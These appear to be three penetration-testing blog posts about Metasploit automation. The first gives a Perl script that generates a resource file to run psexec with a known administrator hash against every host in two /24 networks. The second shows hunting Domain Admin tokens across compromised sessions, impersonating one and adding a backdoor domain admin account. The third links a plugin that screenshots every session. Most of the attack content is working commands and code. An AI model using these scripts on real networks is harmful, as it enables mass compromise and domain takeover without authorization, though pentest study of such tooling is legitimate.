Metasploit PSEXEC scanner (via Perl)

(01/14/09) Update: I built a psexec.pl script that can be found here.

Metasploit’s pexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish that Metasploit had, is a scanner version of the psexec exploit module. So I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:


#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser Administrator\n";
print "set SMBPass ADMINISTRATOR:HASH\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";
# first range
foreach(1.. 254) {
    print "set RHOST 192.168.1.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}
# second range
foreach(1.. 254) {
    print "set RHOST 192.168.2.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}


Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc


Lastly, we leverage Metasploit’s ability to execute commands passed into meterpreter via an resource file. Once Metasploit loads psexc.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

msfconsole -r psexec.rc

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.

Regards,
Jabra

Hunting for Domain Admin Tokens

Penetration Assessments are a focused effort to accomplish one or more goals within a limited timeframe. It is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code, really excels! Less time is wasted on mundane tasks. Automation is always key. Automating the tasks that should be automated. It is clear that there are specific tasks that can’t/shouldn’t be automated, but that is a topic for another post.

One nice example I have seen during several on-site assessments, is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network. Finding the token can takes hours of manually work. I mentioned this to HD Moore he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.

Next, we need to build a list of users that are within the Domain Admins groups. This list can be generated using:
net groups "Domain Admins" /domain

Example of the file:
COMPANY\joe-admin
COMPANY\bill-admin
COMPANY\david-admin

We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

To achieve Domain Admin privileges, we need to connect to a session that contained a Domain Admin token.
msf> sessions -i [session-with-domain-admin-token]

Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t

Lastly, we add a new account to the domain and add the account into the Domain Admins group.
C:\net user hack0r h4ck0r) /add /domain
C:\net group "Domain Admins" hack0r /add /domain

Enjoy it and Pwn dem v0hns!

Regards,
Jabra

Build a collage of your next pentest

Here is some code I wrote recently that will take a screenshot of all active metasploit sessions:

http://spl0it.org/files/patches/metasploit/screenshoter.rb

To leverage this code just copy the file into the plugins directory of metasploit v3. Then open up msfconsole and exploit several systems….

Finally, load the plugin and run the screenshot_all_sessions command:
msf> load screenshoter
msf> screenshot_all_sessions

All screenshots will be saved to disk. I have included the IP address in the filename to make things easier for data correlation.

Happy Holidays! Ph33r!

-Jabra